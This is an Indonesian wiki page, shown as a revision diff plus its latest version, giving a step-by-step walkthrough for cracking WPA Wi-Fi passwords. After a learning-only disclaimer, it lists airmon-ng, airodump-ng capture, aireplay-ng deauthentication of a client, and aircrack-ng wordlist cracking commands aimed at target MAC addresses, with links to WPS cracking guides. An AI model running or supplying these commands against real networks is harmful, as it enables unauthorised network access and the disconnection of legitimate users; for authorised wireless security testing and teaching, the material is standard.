Difference between revisions of "Teknik Menjebol WPA"
Onnowpurbo (talk | contribs) |
Onnowpurbo (talk | contribs) |
||
(2 intermediate revisions by the same user not shown) | |||
Line 4: | Line 4: | ||
Menjebol [[WPA]] hampir tidak mungkin. Tapi kalau anda mau memaksa mencoba-nya bisa mencoba langkah berikut walaupun tidak ada jaminan sama sekali bahwa anda dapat menjebol-nya. | Menjebol [[WPA]] hampir tidak mungkin. Tapi kalau anda mau memaksa mencoba-nya bisa mencoba langkah berikut walaupun tidak ada jaminan sama sekali bahwa anda dapat menjebol-nya. | ||
+ | |||
+ | ==Cara Manjur== | ||
+ | |||
+ | * http://lifehacker.com/5873407/how-to-crack-a-wi+fi-networks-wpa-password-with-reaver | ||
+ | * http://blog.metasplo.it/2012/01/exploiting-wpa2-wps-vulnerabilities.html | ||
+ | * http://redmine.backtrack-linux.org:8080/issues/316 | ||
+ | |||
+ | |||
+ | |||
+ | ==Cara Lama== | ||
* Kita perlu mencatat tiga (3) hal, yaitu, (1) [[BSSID]] / [[MAC Addresss]] [[AP]], (2) [[MAC address]] [[WLAN]] kita, dan (3) [[Channel]] yang digunakan [[AP]]. | * Kita perlu mencatat tiga (3) hal, yaitu, (1) [[BSSID]] / [[MAC Addresss]] [[AP]], (2) [[MAC address]] [[WLAN]] kita, dan (3) [[Channel]] yang digunakan [[AP]]. | ||
Line 35: | Line 45: | ||
Jalankan [[airodump]] di [[WLAN]] mon0 | Jalankan [[airodump]] di [[WLAN]] mon0 | ||
− | airodump-ng | + | airodump-ng -w hasilcapture --bssid $AP --channel $CHANNEL mon0 |
Versi backtrack 4.0 pre-final ternyata harus menggunakan perintah | Versi backtrack 4.0 pre-final ternyata harus menggunakan perintah | ||
− | airodump-ng --output-format | + | airodump-ng --output-format pcap -w hasilcapture --bssid $AP --channel $CHANNEL mon0 |
Pastikan menggunakan switch --bssid ini akan mempercepat proses cracking :) .. | Pastikan menggunakan switch --bssid ini akan mempercepat proses cracking :) .. | ||
+ | |||
+ | Untuk mempercepat proses gunakan aireplay-ng | ||
+ | |||
+ | aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 mon0 | ||
+ | |||
+ | Dimana | ||
+ | |||
+ | -a MAC AP | ||
+ | -c MAC client | ||
Line 54: | Line 73: | ||
Jalankan [[aircrack]] untuk mengcrack [[WPA]] | Jalankan [[aircrack]] untuk mengcrack [[WPA]] | ||
− | # aircrack-ng | + | # aircrack-ng -w kamuspass.txt -b 00:14:6C:7E:40:80 psk*.cap |
− | + | -b MAC BSSID | |
− | # aircrack-ng -a 2 -e | + | Versi yang lebih panjang |
− | # aircrack-ng -a 2 -e $AP -n 64 hasilcapture | + | |
+ | # aircrack-ng -a 2 -e essidapyangakandicrack -n 64 hasilcapture* -w kamuspass.txt | ||
+ | # aircrack-ng -a 2 -e linksys -n 64 hasilcapture* -w kamuspass.txt | ||
+ | # aircrack-ng -a 2 -e $AP -n 64 hasilcapture* -w kamuspass.txt | ||
Bisa juga menggunakan perintah | Bisa juga menggunakan perintah | ||
− | # aircrack-ng -a 2 -n 64 hasilcapture | + | # aircrack-ng -a 2 -n 64 hasilcapture* -w kamuspass.txt |
Switch -a 2 digunakan untuk menset aircrack-ng agar meng-crack [[WPA]] | Switch -a 2 digunakan untuk menset aircrack-ng agar meng-crack [[WPA]] | ||
− | |||
− | |||
==Referensi== | ==Referensi== | ||
Line 86: | Line 106: | ||
* [[Wireless Internet]] | * [[Wireless Internet]] | ||
* [[Linux Howto]] | * [[Linux Howto]] | ||
+ | * [[ESP8266: deauther]] |
Latest revision as of 03:51, 16 August 2023
Informasi dan Pengetahuan yang terkandung pada halaman ini maupun turunannya di peruntukan sebagai informasi pembelajaran semata. Pengetahuan ini bukan untuk digunakan untuk melakukan tindak kejahatan maupun melawan hukum. Anda yang melakukan tindak tersebut, berada di luar tanggung jawab penulis tulisan ini & harus berharapan sendiri dengan aparat penegak hukum.
Menjebol WPA hampir tidak mungkin. Tapi kalau anda mau memaksa mencoba-nya bisa mencoba langkah berikut walaupun tidak ada jaminan sama sekali bahwa anda dapat menjebol-nya.
Cara Manjur
- http://lifehacker.com/5873407/how-to-crack-a-wi+fi-networks-wpa-password-with-reaver
- http://blog.metasplo.it/2012/01/exploiting-wpa2-wps-vulnerabilities.html
- http://redmine.backtrack-linux.org:8080/issues/316
Cara Lama
- Kita perlu mencatat tiga (3) hal, yaitu, (1) BSSID / MAC Addresss AP, (2) MAC address WLAN kita, dan (3) Channel yang digunakan AP.
Misalnya,
BSSID 00:30:4F:4E:2B:50 WIFI 00:11:6b:33:d3:90 CHANNEL 2
Untuk memudahkan operasi ada baiknya melakukan di shell
export AP=00:30:4F:4E:2B:50 export WIFI=00:11:6b:33:d3:90 export CHANNEL=1
Setup supaya interface WiFi masuk ke mode monitoring menggunakan perintah
airmon-ng start wlan0 1
Biasanya akan tampil kira-kira sebagai berikut
Interface Chipset Driver wlan0 Intel 3945ABG iwl3945 - [phy0] (monitor mode enabled on mon0)
Perhatikan baik-baik bahwa interface wlan0 yang berubah menjadi mode monitor adalah mon0. Kita harus menggunakan interface mon0 untuk melakukan monitor.
Jalankan airodump di WLAN mon0
airodump-ng -w hasilcapture --bssid $AP --channel $CHANNEL mon0
Versi backtrack 4.0 pre-final ternyata harus menggunakan perintah
airodump-ng --output-format pcap -w hasilcapture --bssid $AP --channel $CHANNEL mon0
Pastikan menggunakan switch --bssid ini akan mempercepat proses cracking :) ..
Untuk mempercepat proses gunakan aireplay-ng
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 mon0
Dimana
-a MAC AP -c MAC client
Kunci dari proses cracking WPA adalah ketersediaan kamus silahkan di cek ke
- http://www.aircrack-ng.org/doku.php?id=faq
- http://www.aircrack-ng.org/doku.php?id=faq#how_can_i_crack_a_wpa-psk_network
- http://www.aircrack-ng.org/doku.php?id=faq#where_can_i_find_good_wordlists
Dalam contoh paket hasil monitoring akan di simpan di file hasilcapture.
Jalankan aircrack untuk mengcrack WPA
# aircrack-ng -w kamuspass.txt -b 00:14:6C:7E:40:80 psk*.cap
-b MAC BSSID
Versi yang lebih panjang
# aircrack-ng -a 2 -e essidapyangakandicrack -n 64 hasilcapture* -w kamuspass.txt # aircrack-ng -a 2 -e linksys -n 64 hasilcapture* -w kamuspass.txt # aircrack-ng -a 2 -e $AP -n 64 hasilcapture* -w kamuspass.txt
Bisa juga menggunakan perintah
# aircrack-ng -a 2 -n 64 hasilcapture* -w kamuspass.txt
Switch -a 2 digunakan untuk menset aircrack-ng agar meng-crack WPA
Referensi
- http://www.aircrack-ng.org/doku.php?id=faq
- http://www.aircrack-ng.org/doku.php?id=faq#how_can_i_crack_a_wpa-psk_network
- http://www.aircrack-ng.org/doku.php?id=faq#where_can_i_find_good_wordlists